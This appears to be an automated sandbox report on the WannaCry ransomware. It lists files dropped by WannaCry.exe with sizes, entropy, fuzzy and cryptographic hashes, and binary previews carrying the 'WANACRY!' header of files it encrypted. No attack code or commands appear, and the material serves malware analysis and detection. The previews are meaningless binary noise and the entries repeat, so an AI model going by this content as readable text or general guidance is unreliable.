                                                                              Preview:WANACRY!.......)..d.}.{............kg..v....V>.U.nxM./..j~..)..0#...P..xf6t)...L...+...Y.\.5..82...3......A.qo.#.<..w..'1m.n...L.........bq..{.X.I.....5..X.....z..s+._...X(.w.._.>.G.4....8...G.Vh.t.+....x.3Z...V.9.I...%7Qv.{%.......b..h....M....A.e"a."..K.............%a.Xp..........RQ... b..".iQq.M.>X.....~a.*2...W&..x.....\.....j.1..m.&R8}..)....<...K6N......hK.....p...]c.?9A<.*.u.u.W^......l?.A........6#...y.+[;...V......,.:..'5.%.I.R7.....U.U..o....gv...54.6.....k .Hio..J..k.]..U....4.m...+xr..J.3....FZ".e.y."..J....."G...7URN.Z.m....5Dc<f......65I'....$@...o$.$K..wX......Ha...H..K.#.....r..2.......$..8b..V^..$4B.....MO.AP/3.....&`.n.<.........;b...M.kCA..%).=.A...9FI.q....B.=.t..j..).VC..OQ...v..-P.......~....KL....:.>t.....^.u.y.../'x5.TUMf..L.2.I..|.s}8"A...j".O..p.ZY......GI5.p2.....G.'....C3.L.`4d...x\.+....}c#....<.E..#.5.Z.*D.....l-..........i...&......$<pG$E..Z;.$o.LTEAFgW.@u]5....}.S..!.=.+$[.......g..M.L..8.w<0gq..O.vX[.....m..7[h..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1800
                                                                              Entropy (8bit):7.897199624217603
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkMuvc0et842N0xReL+phdz/vQpm0493TuZIzV:orc0etD2N0x4+phdj8mRuZI5
                                                                              MD5:96CAE82B2B748EE18A05AA7CB24127AE
                                                                              SHA1:57C5A238606DCE53A5C9BC57129626342F8DC929
                                                                              SHA-256:8839E467F7F6BBE39C1362C7A4854D05A26C2186347694A2EAA5E6B09BE0E804
                                                                              SHA-512:693199D82B85EDEDE5E5D8115711995723B10D734324AF6C2C7EFA27B91A9FE4F305E27584DBB27BCF38AB38FCCF9E79A9196D5E6D51BD68EBC2FAA886E5C1BC
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......)..d.}.{............kg..v....V>.U.nxM./..j~..)..0#...P..xf6t)...L...+...Y.\.5..82...3......A.qo.#.<..w..'1m.n...L.........bq..{.X.I.....5..X.....z..s+._...X(.w.._.>.G.4....8...G.Vh.t.+....x.3Z...V.9.I...%7Qv.{%.......b..h....M....A.e"a."..K.............%a.Xp..........RQ... b..".iQq.M.>X.....~a.*2...W&..x.....\.....j.1..m.&R8}..)....<...K6N......hK.....p...]c.?9A<.*.u.u.W^......l?.A........6#...y.+[;...V......,.:..'5.%.I.R7.....U.U..o....gv...54.6.....k .Hio..J..k.]..U....4.m...+xr..J.3....FZ".e.y."..J....."G...7URN.Z.m....5Dc<f......65I'....$@...o$.$K..wX......Ha...H..K.#.....r..2.......$..8b..V^..$4B.....MO.AP/3.....&`.n.<.........;b...M.kCA..%).=.A...9FI.q....B.=.t..j..).VC..OQ...v..-P.......~....KL....:.>t.....^.u.y.../'x5.TUMf..L.2.I..|.s}8"A...j".O..p.ZY......GI5.p2.....G.'....C3.L.`4d...x\.+....}c#....<.E..#.5.Z.*D.....l-..........i...&......$<pG$E..Z;.$o.LTEAFgW.@u]5....}.S..!.=.+$[.......g..M.L..8.w<0gq..O.vX[.....m..7[h..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2136
                                                                              Entropy (8bit):7.892233044886932
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkbMhR/kootkGPz8VnGy8lKzh2whVTjAwTo9yzSUgIKB:obMfnoStgy8Q9hPo9QvJS
                                                                              MD5:C6E8536CF48E33059D29C6BB6E7DE3C7
                                                                              SHA1:E3B8841F82EA5F5D1530A0A7590C02AA834F200F
                                                                              SHA-256:D4F27867BB6F6E8C84CD2408E017A454FF512B671D94D41DD91EDE44F1486511
                                                                              SHA-512:3EF142AD645B8FE9F931F2C316EFC9284506A4F4FC31A111998EDEA7BB872213E9FE3875D72A167FB63879FCFB3C43A96A5E36F8DEB0BEB129F4EC823C20B12F
                                                                              Malicious:false
                                                                              Preview:WANACRY!....."...el.1.}......C.w...c...........~...9py...2..!.B..M.P..c]...P~U$=.T...1.....N2...K..HD.'....n5.k96.t..].f...8...x.X..H.._l..2.....-.U....:OP2..^..Ql?.Q......a.2.t..r7].....X.R..)K@.%=Z.L...{".#....E.>.........[._Xb.P.Rv=...YQ._.Q`j...D....7........4.S.O...M.|[..C.Z..=..9.zqG..o........e).......O...5. .....V...I!.m}..{]...-.4....g~......5ef.q......e..KIA.........~N..._.\..j....{....O.*...22.;.U0M..t.>,..e..G.9.j..........s2...5.y..A6..L.a.k..|...P..60.l.9!..<8RE1L.Q..x}....Lx-....W.)......4..V..Z..@..).. .nz.O.._.'..b..._W.....C.o. .....@....1..|....r......q.Td..D||....`....q8....O....".j(...Wv.8._'P^.n.M6.F.|..a....Z9f.f9N..4.,@g.%u..q.1..<.z...pT.I.qG.a.O..h....+'{.*...}c_...\@.+.2...s.....[.O...R......T.K..,W.@{csHhc..=.E..x..z.O.2n..-...o.,.VZ.6..5..(..{..1..O..%..P0P.m.u..|<.....,.U..].....a`.Z..`u.)a..-..e.FXDS...M.I&Ao..0;...;.".....MVL.4.U...........x..........w..6.sI.dS.+A..0..L4...!....O1t.P..O....h. ..J.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2136
                                                                              Entropy (8bit):7.892233044886932
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkbMhR/kootkGPz8VnGy8lKzh2whVTjAwTo9yzSUgIKB:obMfnoStgy8Q9hPo9QvJS
                                                                              MD5:C6E8536CF48E33059D29C6BB6E7DE3C7
                                                                              SHA1:E3B8841F82EA5F5D1530A0A7590C02AA834F200F
                                                                              SHA-256:D4F27867BB6F6E8C84CD2408E017A454FF512B671D94D41DD91EDE44F1486511
                                                                              SHA-512:3EF142AD645B8FE9F931F2C316EFC9284506A4F4FC31A111998EDEA7BB872213E9FE3875D72A167FB63879FCFB3C43A96A5E36F8DEB0BEB129F4EC823C20B12F
                                                                              Malicious:false
                                                                              Preview:WANACRY!....."...el.1.}......C.w...c...........~...9py...2..!.B..M.P..c]...P~U$=.T...1.....N2...K..HD.'....n5.k96.t..].f...8...x.X..H.._l..2.....-.U....:OP2..^..Ql?.Q......a.2.t..r7].....X.R..)K@.%=Z.L...{".#....E.>.........[._Xb.P.Rv=...YQ._.Q`j...D....7........4.S.O...M.|[..C.Z..=..9.zqG..o........e).......O...5. .....V...I!.m}..{]...-.4....g~......5ef.q......e..KIA.........~N..._.\..j....{....O.*...22.;.U0M..t.>,..e..G.9.j..........s2...5.y..A6..L.a.k..|...P..60.l.9!..<8RE1L.Q..x}....Lx-....W.)......4..V..Z..@..).. .nz.O.._.'..b..._W.....C.o. .....@....1..|....r......q.Td..D||....`....q8....O....".j(...Wv.8._'P^.n.M6.F.|..a....Z9f.f9N..4.,@g.%u..q.1..<.z...pT.I.qG.a.O..h....+'{.*...}c_...\@.+.2...s.....[.O...R......T.K..,W.@{csHhc..=.E..x..z.O.2n..-...o.,.VZ.6..5..(..{..1..O..%..P0P.m.u..|<.....,.U..].....a`.Z..`u.)a..-..e.FXDS...M.I&Ao..0;...;.".....MVL.4.U...........x..........w..6.sI.dS.+A..0..L4...!....O1t.P..O....h. ..J.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5656
                                                                              Entropy (8bit):7.969301077967847
                                                                              Encrypted:false
                                                                              SSDEEP:96:o221zy2DJwyVZ+/7qMUJAiTtZovSjFrGGVTxrEDcBS6rURlsFv7jp0LfV3Z:BMzy29wSZA7pUJAGZo8FRdrEYgIGlsFY
                                                                              MD5:A6E34348C319718717FB4B343E762CF6
                                                                              SHA1:93FC3F008FE2A67878F0EDBECCF0B988D13DB1A9
                                                                              SHA-256:A774887B49CF1CDBE6B9912FC06CADB2FF9D3C6FD6F8B00BA1186986397067D1
                                                                              SHA-512:4FADB664EBA19BD2E5E23609DBAB9A85F0DEE83281ED8C8E976E737FF686F431C6E2962E580149DE3872B064DB1A19ED2F57CFBED3809D0CAD300E133A28779E
                                                                              Malicious:false
                                                                              Preview:WANACRY!....69...'j..........(9_.iW..;.2h.~7..tp.?..y.u.#[...W.MgA5.N2..T.9;x.$Q.5$&7.....".`k.....lw!......"(J.~5....K.n....|..Q.e.)..O.L|Y...6....[5....O.yo.[..h.|+Z....v.........5n.f.7je...E......}.......,&.4<...h.\Q#..'h...n.T(.....K?.e..XTU$z.B .*.{..MPc...............V..R......=..U.>.[s].U......<.W........e..)......l..=.X:@>r.@...x.<n...M..&..A.3....1d.Bre.R..9......+.,7.).TX.X.&...#.w....l..P]../>W.g.cl..F.#X...W.a..[H|..Dd.'?h?...U.....[..2.f....2.y...>FB.m3..g...w.....q................{...|.....n..9PP......<wq.;.n...N.^.BT.{.d.Ly..........\&.........-%._5.L.<*.%.h.{.~.B../.).#...../....{q.>."Q=...U@ TH.P.x.Q<8<..qi./.....@..$...&..y_..D..d..?...6..dw....d>..=.<.....T...}.D...>..4.....}.8....mk.5.....@...H..<.y.....'.Ot@.xa....U...0._d_.]....N..G..9.l.I..R.r...q}......zSV!...P.&..uQ................$(...3./.=E\........u."....).8hY..#...L.R.:...S0..-}ZD...F.......C...k...b.....).7......w.D)..O.i..?V.4..*-.m.....x..iN.}..,.Z..........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):5656
                                                                              Entropy (8bit):7.969301077967847
                                                                              Encrypted:false
                                                                              SSDEEP:96:o221zy2DJwyVZ+/7qMUJAiTtZovSjFrGGVTxrEDcBS6rURlsFv7jp0LfV3Z:BMzy29wSZA7pUJAGZo8FRdrEYgIGlsFY
                                                                              MD5:A6E34348C319718717FB4B343E762CF6
                                                                              SHA1:93FC3F008FE2A67878F0EDBECCF0B988D13DB1A9
                                                                              SHA-256:A774887B49CF1CDBE6B9912FC06CADB2FF9D3C6FD6F8B00BA1186986397067D1
                                                                              SHA-512:4FADB664EBA19BD2E5E23609DBAB9A85F0DEE83281ED8C8E976E737FF686F431C6E2962E580149DE3872B064DB1A19ED2F57CFBED3809D0CAD300E133A28779E
                                                                              Malicious:false
                                                                              Preview:WANACRY!....69...'j..........(9_.iW..;.2h.~7..tp.?..y.u.#[...W.MgA5.N2..T.9;x.$Q.5$&7.....".`k.....lw!......"(J.~5....K.n....|..Q.e.)..O.L|Y...6....[5....O.yo.[..h.|+Z....v.........5n.f.7je...E......}.......,&.4<...h.\Q#..'h...n.T(.....K?.e..XTU$z.B .*.{..MPc...............V..R......=..U.>.[s].U......<.W........e..)......l..=.X:@>r.@...x.<n...M..&..A.3....1d.Bre.R..9......+.,7.).TX.X.&...#.w....l..P]../>W.g.cl..F.#X...W.a..[H|..Dd.'?h?...U.....[..2.f....2.y...>FB.m3..g...w.....q................{...|.....n..9PP......<wq.;.n...N.^.BT.{.d.Ly..........\&.........-%._5.L.<*.%.h.{.~.B../.).#...../....{q.>."Q=...U@ TH.P.x.Q<8<..qi./.....@..$...&..y_..D..d..?...6..dw....d>..=.<.....T...}.D...>..4.....}.8....mk.5.....@...H..<.y.....'.Ot@.xa....U...0._d_.]....N..G..9.l.I..R.r...q}......zSV!...P.&..uQ................$(...3./.=E\........u."....).8hY..#...L.R.:...S0..-}ZD...F.......C...k...b.....).7......w.D)..O.i..?V.4..*-.m.....x..iN.}..,.Z..........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3208
                                                                              Entropy (8bit):7.946685692651756
                                                                              Encrypted:false
                                                                              SSDEEP:96:o1qOwI6mpTXHUcx3dGZWiYHxrAO2e4Wv4ypNfRJPn:ZOjZXHUaGZhHf6NZJf
                                                                              MD5:916CEB285DA4641F20F93F10D7177141
                                                                              SHA1:FE40502591911323E50FACA869DBFB20F42B5299
                                                                              SHA-256:9A7EC531B56C87C8DA495D5D426915A2BB9EDA0E7E2D427826EB663824C81E5D
                                                                              SHA-512:FCE64F4A3984EC2CE1FC738B301A788F4E76E4863CAB32B80212062477968CC777499E2BFA1E24B47BDF19C5D5040651CE9124E46A58BF47DD03646E1A9FB2E7
                                                                              Malicious:false
                                                                              Preview:WANACRY!....`1S......i.....M....<..I..8...-1...u..<..J.,......B^..;..*..:..'..&F..XT...B.c..:.....O..6p..C..m..1&..>;....Br..0..0.;.s....Sx;.5....i|...............e../..8..K....3.{.:g.l.......L#.XJ.50..."..V.....y..%.CH...2L...........9.GO..^.."f..}.:E.u....g..........._}....:s.'..?.D..'nR.C.(..V.&..O.\..>!cG..dT.>.i..k.+V.-L..p...J..!.........^.o.M.9 .T....].p......|.J.....^.s.#~.......P...q.|.....k.v.'9...{..bI..R.2 ..."...2s..<..H....".j....6Bq-...$...A~..1./.US..._b....t......>...".*..Ic.k[.. .t%mEV....'L/.;>..}...Q.?M...m][;8..g+O9.*....W..C=Y.p.VF..i..0....d..fkn9.....2..`..h..j. %.}.......l..K..F.(+.fz..Y}g.....~..w..4=.C..e..C.....^.Fb.|.a.R;k.z.P..;.4n.|4d.P..*....%W...(.......:.....Z3Q|.......[.....vbU..9..|......#..v.p<`@...J..w....4c.....D..f#......)...c..\5..I.B...E..-.?...8.?@.:L.q...YqB.J.cO.......<.>.-!..=...(..Hl............d..].. .L.-8f./_.,Yc...........&.)..W9..:..N......!.G6HP.q.]......;.H1.g(Y..L+..r...-.f(MY.Q..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3208
                                                                              Entropy (8bit):7.946685692651756
                                                                              Encrypted:false
                                                                              SSDEEP:96:o1qOwI6mpTXHUcx3dGZWiYHxrAO2e4Wv4ypNfRJPn:ZOjZXHUaGZhHf6NZJf
                                                                              MD5:916CEB285DA4641F20F93F10D7177141
                                                                              SHA1:FE40502591911323E50FACA869DBFB20F42B5299
                                                                              SHA-256:9A7EC531B56C87C8DA495D5D426915A2BB9EDA0E7E2D427826EB663824C81E5D
                                                                              SHA-512:FCE64F4A3984EC2CE1FC738B301A788F4E76E4863CAB32B80212062477968CC777499E2BFA1E24B47BDF19C5D5040651CE9124E46A58BF47DD03646E1A9FB2E7
                                                                              Malicious:false
                                                                              Preview:WANACRY!....`1S......i.....M....<..I..8...-1...u..<..J.,......B^..;..*..:..'..&F..XT...B.c..:.....O..6p..C..m..1&..>;....Br..0..0.;.s....Sx;.5....i|...............e../..8..K....3.{.:g.l.......L#.XJ.50..."..V.....y..%.CH...2L...........9.GO..^.."f..}.:E.u....g..........._}....:s.'..?.D..'nR.C.(..V.&..O.\..>!cG..dT.>.i..k.+V.-L..p...J..!.........^.o.M.9 .T....].p......|.J.....^.s.#~.......P...q.|.....k.v.'9...{..bI..R.2 ..."...2s..<..H....".j....6Bq-...$...A~..1./.US..._b....t......>...".*..Ic.k[.. .t%mEV....'L/.;>..}...Q.?M...m][;8..g+O9.*....W..C=Y.p.VF..i..0....d..fkn9.....2..`..h..j. %.}.......l..K..F.(+.fz..Y}g.....~..w..4=.C..e..C.....^.Fb.|.a.R;k.z.P..;.4n.|4d.P..*....%W...(.......:.....Z3Q|.......[.....vbU..9..|......#..v.p<`@...J..w....4c.....D..f#......)...c..\5..I.B...E..-.?...8.?@.:L.q...YqB.J.cO.......<.>.-!..=...(..Hl............d..].. .L.-8f./_.,Yc...........&.)..W9..:..N......!.G6HP.q.]......;.H1.g(Y..L+..r...-.f(MY.Q..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):12520
                                                                              Entropy (8bit):7.984895075861123
                                                                              Encrypted:false
                                                                              SSDEEP:192:vtP8QGo5l/2ayKOMJ6s+L8I2JJYZu2kq0VYG+5umztnF8ueTfHbrCfKbLk+WnSC8:KQ1uFou8cmjKH5umWbH6b+WSC/lN+Om
                                                                              MD5:312483D697F76FAB0FF922ED8CB79CC8
                                                                              SHA1:5390B067A4D8284E16CD3147F2F5CAF1679AE5D7
                                                                              SHA-256:577490ECF2873A42DC288E71CCB5723D47B5F34E6A698933191969B8F60F5A57
                                                                              SHA-512:21E94FBEE1F51D548FBF58B5A40B65E863CE937BD0D9BB334FA0CC67A7EBFC7C9E910C8FC448D9BB08565D355E1119D964366134136DC1E957F53F05E3FA9911
                                                                              Malicious:false
                                                                              Preview:WANACRY!....8x...Z>._A.6*w.;....?.......Wb%fG.m..}:UZ..>=..x.....k..S...h...:[.QN.c.;..9%fV....:...v)..X_g....`...../.......!...(4.....0\....f.....+......$..i!W......U.%.U.,....).%...'1>.R.`..0Xon.....(E.X.@}...8$..q.Q.|...~h..P+!.w'.......2n............/........<__.}..|..U.8..t.i...Om.A+...A.>w....k..d..:......:...$..?........F.....0...?TOh.{(....Pl.,.~.X..>R...#...i......2.*-K.H,...4.%K...mT...../e...2.\....*b.s..?i...&...}U..l......C...3..T.r=..........X.YGf....u.....I.Ez.U.....s.[s.......9...[.v....|.L.AA...*...JS../....u.c...i...jk5ZEi....XZ.8R..'.?xF{...d0.X5.O+..v...e..K......o(.....n...)".....Sp.Cv'..*>.?d;.Q._.R~.....-.a"&8Y...........eaO#.<k.Hp.=-.|G..qn..'HL..........a8.{'t.+MR.../.......%u..._..p....1 ....a......C.d4.J.Q]JIk x.........Y...~....z.I!Yx...R.F`}.o..14.v\70.m.@Ei...H.&...f..dN`..5....p1=y..0...(.....o}...Y_.......v.P7.v.W..M..cl....`H.<7L..<[n..p1+.q2..4{.....q.D.Zg...-..u.p..y.....|.}.%..Ggo)>.#...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):12520
                                                                              Entropy (8bit):7.984895075861123
                                                                              Encrypted:false
                                                                              SSDEEP:192:vtP8QGo5l/2ayKOMJ6s+L8I2JJYZu2kq0VYG+5umztnF8ueTfHbrCfKbLk+WnSC8:KQ1uFou8cmjKH5umWbH6b+WSC/lN+Om
                                                                              MD5:312483D697F76FAB0FF922ED8CB79CC8
                                                                              SHA1:5390B067A4D8284E16CD3147F2F5CAF1679AE5D7
                                                                              SHA-256:577490ECF2873A42DC288E71CCB5723D47B5F34E6A698933191969B8F60F5A57
                                                                              SHA-512:21E94FBEE1F51D548FBF58B5A40B65E863CE937BD0D9BB334FA0CC67A7EBFC7C9E910C8FC448D9BB08565D355E1119D964366134136DC1E957F53F05E3FA9911
                                                                              Malicious:false
                                                                              Preview:WANACRY!....8x...Z>._A.6*w.;....?.......Wb%fG.m..}:UZ..>=..x.....k..S...h...:[.QN.c.;..9%fV....:...v)..X_g....`...../.......!...(4.....0\....f.....+......$..i!W......U.%.U.,....).%...'1>.R.`..0Xon.....(E.X.@}...8$..q.Q.|...~h..P+!.w'.......2n............/........<__.}..|..U.8..t.i...Om.A+...A.>w....k..d..:......:...$..?........F.....0...?TOh.{(....Pl.,.~.X..>R...#...i......2.*-K.H,...4.%K...mT...../e...2.\....*b.s..?i...&...}U..l......C...3..T.r=..........X.YGf....u.....I.Ez.U.....s.[s.......9...[.v....|.L.AA...*...JS../....u.c...i...jk5ZEi....XZ.8R..'.?xF{...d0.X5.O+..v...e..K......o(.....n...)".....Sp.Cv'..*>.?d;.Q._.R~.....-.a"&8Y...........eaO#.<k.Hp.=-.|G..qn..'HL..........a8.{'t.+MR.../.......%u..._..p....1 ....a......C.d4.J.Q]JIk x.........Y...~....z.I!Yx...R.F`}.o..14.v\70.m.@Ei...H.&...f..dN`..5....p1=y..0...(.....o}...Y_.......v.P7.v.W..M..cl....`H.<7L..<[n..p1+.q2..4{.....q.D.Zg...-..u.p..y.....|.}.%..Ggo)>.#...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1848
                                                                              Entropy (8bit):7.900446971849389
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkQifHhQCZpAJ383CC6b2N1sg7Sd+o9LlrEMqvP/xe/PyI:oQYHhQoqh83rmqsg7Sd+onWvnS7
                                                                              MD5:67DE81954CFAD6750960D8D138343251
                                                                              SHA1:FA4006AF275A8EAE89C31D9B0756A52B20A16321
                                                                              SHA-256:2BCBF749B76B5401CA4802D6AC3164834F623CBCE3E8543179D870DD8C4FEDFA
                                                                              SHA-512:CE27723BE9DE5473824E22FBFBC22DAB345A8F0E555A85E1426E01DCD34A34680B765F4A7FA560D48C7AD254D1ABF871BE9F689266991FF6C710064E07367DE3
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....-o..mHr.!..M....R..{...<.W......T......O..C....\.).7.j.zW#......_K...VtF~..C...X9.....e...~.."...a.C..1.Z'....:...(.......,...\.(.._..........&R..... ..R.W.../n0..}......h.|}.....[..XD.%.M...&...}..u..3.t...Cw.y....VK....$...:...0O.<..FO.b..............KF..*.a.?.Ut....D.j.@../...p.\(Jc].9A'o.Ic...b..A.&].3...!.w.........Mn...c..I.....9.h.k......v..m{...R.........4.q.w~s.qPg..E.B8M.2PJ...i.......*.^~%..,}..In.#. .X.H{..S=vAb.....U.s."G...L..s.lN}.H..l!..}.}..(]B.9B..ag..N.G^..cA....!...M.....\....f[...=...-:... ...u.u..T........=..3.y3f...p.f....D.u.H'.T.....\#,?;q.(.,.........G.af.o'=p(Z...<^M..%.....^..G'.......KP..^.-....k..@..!....^.h4..Y}...f.r.\.ee...?.;8.....e.y..L..t.x..6f.k>....v.f.(.T......4.;..0...d.~.P._.z.7...g..n.9|qW.;L"..[O.8=.c.T.e.w...nQ...*.&.b.]Ti4v..OQi..,\ !W.(J..._..8.d.hZ...B..gm.)....5.E..A.)..\....h..@%.R).0PQ...........S.....4..0.....P...G[,....?Z..Gf.A...2............O.69_dW{l..,..... ..M...........x......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1848
                                                                              Entropy (8bit):7.900446971849389
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkQifHhQCZpAJ383CC6b2N1sg7Sd+o9LlrEMqvP/xe/PyI:oQYHhQoqh83rmqsg7Sd+onWvnS7
                                                                              MD5:67DE81954CFAD6750960D8D138343251
                                                                              SHA1:FA4006AF275A8EAE89C31D9B0756A52B20A16321
                                                                              SHA-256:2BCBF749B76B5401CA4802D6AC3164834F623CBCE3E8543179D870DD8C4FEDFA
                                                                              SHA-512:CE27723BE9DE5473824E22FBFBC22DAB345A8F0E555A85E1426E01DCD34A34680B765F4A7FA560D48C7AD254D1ABF871BE9F689266991FF6C710064E07367DE3
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....-o..mHr.!..M....R..{...<.W......T......O..C....\.).7.j.zW#......_K...VtF~..C...X9.....e...~.."...a.C..1.Z'....:...(.......,...\.(.._..........&R..... ..R.W.../n0..}......h.|}.....[..XD.%.M...&...}..u..3.t...Cw.y....VK....$...:...0O.<..FO.b..............KF..*.a.?.Ut....D.j.@../...p.\(Jc].9A'o.Ic...b..A.&].3...!.w.........Mn...c..I.....9.h.k......v..m{...R.........4.q.w~s.qPg..E.B8M.2PJ...i.......*.^~%..,}..In.#. .X.H{..S=vAb.....U.s."G...L..s.lN}.H..l!..}.}..(]B.9B..ag..N.G^..cA....!...M.....\....f[...=...-:... ...u.u..T........=..3.y3f...p.f....D.u.H'.T.....\#,?;q.(.,.........G.af.o'=p(Z...<^M..%.....^..G'.......KP..^.-....k..@..!....^.h4..Y}...f.r.\.ee...?.;8.....e.y..L..t.x..6f.k>....v.f.(.T......4.;..0...d.~.P._.z.7...g..n.9|qW.;L"..[O.8=.c.T.e.w...nQ...*.&.b.]Ti4v..OQi..,\ !W.(J..._..8.d.hZ...B..gm.)....5.E..A.)..\....h..@%.R).0PQ...........S.....4..0.....P...G[,....?Z..Gf.A...2............O.69_dW{l..,..... ..M...........x......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2664
                                                                              Entropy (8bit):7.920961214019468
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk70R92U+R8I/GrslY/X784eZMH84aPWn7W1FZ+GFTqMfpPj5DE0Q80wr+g:obxuIuroYf784eZMHZeWn7W1j+GFTqeB
                                                                              MD5:13E59DFE407D1D8C15AED68B915974A3
                                                                              SHA1:A50591E85AE452718398715434B595A39D2985F0
                                                                              SHA-256:328AF92CA5ED7A08A480390883B25E6E43F00FF06E063D1AEC0810AACDC269A1
                                                                              SHA-512:B48679BD3E7B38242E5EF8215A11D40B10967AE2EE0D211C4AB6F8C11AB68E30766985C40F0BBD393DEFF69E19F35263FD3BA132F43B7D97EFC47F42AFD45108
                                                                              Malicious:false
                                                                              Preview:WANACRY!......zA.{.b...Z{.....=....8A?q%..I/8........e.7%.."t....i.j....c).....$Zl_..y...\.p.U..d.+..;.s5.}.[ ]9Z..S.l.32U..'&..s.M.Lt.......f.........b>...._~.DU/.....D........p...F...@.u......p[A..Hv..v.....G?..Y..{..........a..........`.T.cv...5.:...B..s....M.......d....'.....6;....O@.Be...3..n;.d..G.;P...^R_..E&....z....I.*......._.X....^.Z....aQ.h../x.R>.:..9...].....b..\.r.$........!~...;......1.W.G......+.t.#...[...?.._z....Q...4 ...G8.&m.=.x.C.`^..d.H."@.U.k.4.O........*.s.5.6u.NAk..'..<..9...*.h..)..].E.0&..1]0.~@.EP....|U.u.|...sI.s.....D.z2.@..?>6m..s..<x..o`......!...B..+.R.xGh......U.A-2.6..d...B..[.....#...'.Wv..mk.....Fw...`j...Lc."n9.@.L..M_.]&^M5..X%.$.g..)7tx...1.'.X......,.a."....&.m...rp.F..o.l^...!.Qy.@.U.A....us......5...5.).|.V...=..k..r..i9.%.._$.\1..<B.<.y.).n$....P..Z..F.$..._Pu.....0<....`Q...-....g9.....Z.y.2.`:..\..P.&........O(.......K....2......dTz.|..j...5.VQ..0..1.L..B7.u@.^.[..%.M.'.#.j..'.[.Al.R
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2664
                                                                              Entropy (8bit):7.920961214019468
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk70R92U+R8I/GrslY/X784eZMH84aPWn7W1FZ+GFTqMfpPj5DE0Q80wr+g:obxuIuroYf784eZMHZeWn7W1j+GFTqeB
                                                                              MD5:13E59DFE407D1D8C15AED68B915974A3
                                                                              SHA1:A50591E85AE452718398715434B595A39D2985F0
                                                                              SHA-256:328AF92CA5ED7A08A480390883B25E6E43F00FF06E063D1AEC0810AACDC269A1
                                                                              SHA-512:B48679BD3E7B38242E5EF8215A11D40B10967AE2EE0D211C4AB6F8C11AB68E30766985C40F0BBD393DEFF69E19F35263FD3BA132F43B7D97EFC47F42AFD45108
                                                                              Malicious:false
                                                                              Preview:WANACRY!......zA.{.b...Z{.....=....8A?q%..I/8........e.7%.."t....i.j....c).....$Zl_..y...\.p.U..d.+..;.s5.}.[ ]9Z..S.l.32U..'&..s.M.Lt.......f.........b>...._~.DU/.....D........p...F...@.u......p[A..Hv..v.....G?..Y..{..........a..........`.T.cv...5.:...B..s....M.......d....'.....6;....O@.Be...3..n;.d..G.;P...^R_..E&....z....I.*......._.X....^.Z....aQ.h../x.R>.:..9...].....b..\.r.$........!~...;......1.W.G......+.t.#...[...?.._z....Q...4 ...G8.&m.=.x.C.`^..d.H."@.U.k.4.O........*.s.5.6u.NAk..'..<..9...*.h..)..].E.0&..1]0.~@.EP....|U.u.|...sI.s.....D.z2.@..?>6m..s..<x..o`......!...B..+.R.xGh......U.A-2.6..d...B..[.....#...'.Wv..mk.....Fw...`j...Lc."n9.@.L..M_.]&^M5..X%.$.g..)7tx...1.'.X......,.a."....&.m...rp.F..o.l^...!.Qy.@.U.A....us......5...5.).|.V...=..k..r..i9.%.._$.\1..<B.<.y.).n$....P..Z..F.$..._Pu.....0<....`Q...-....g9.....Z.y.2.`:..\..P.&........O(.......K....2......dTz.|..j...5.VQ..0..1.L..B7.u@.^.[..%.M.'.#.j..'.[.Al.R
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):3288
                                                                              Entropy (8bit):7.944996954245027
                                                                              Encrypted:false
                                                                              SSDEEP:96:oI6hv4NrQ8fE2QC2C2OEM/W/hCwGhdo2c:xNBfENZCn1ChCwGhdFc
                                                                              MD5:2D602CE627D6265FF3FB2B8A295DD62B
                                                                              SHA1:82E717E8B2391117DFB2D8FD96A3B300C9C62F01
                                                                              SHA-256:363BCE8510F1B5923C3B7623DD0044FDF4FB2D01868254F02C482A9927EDDB7E
                                                                              SHA-512:E940C2984750FBF0863B311ED5FB3F8BBC401B07459C3017A998C24874C7C3CB6CCE1CAF1E954BD5DB3C731F87C2415F5329FB83D6560CA5AEF1CE4FB00B881F
                                                                              Malicious:false
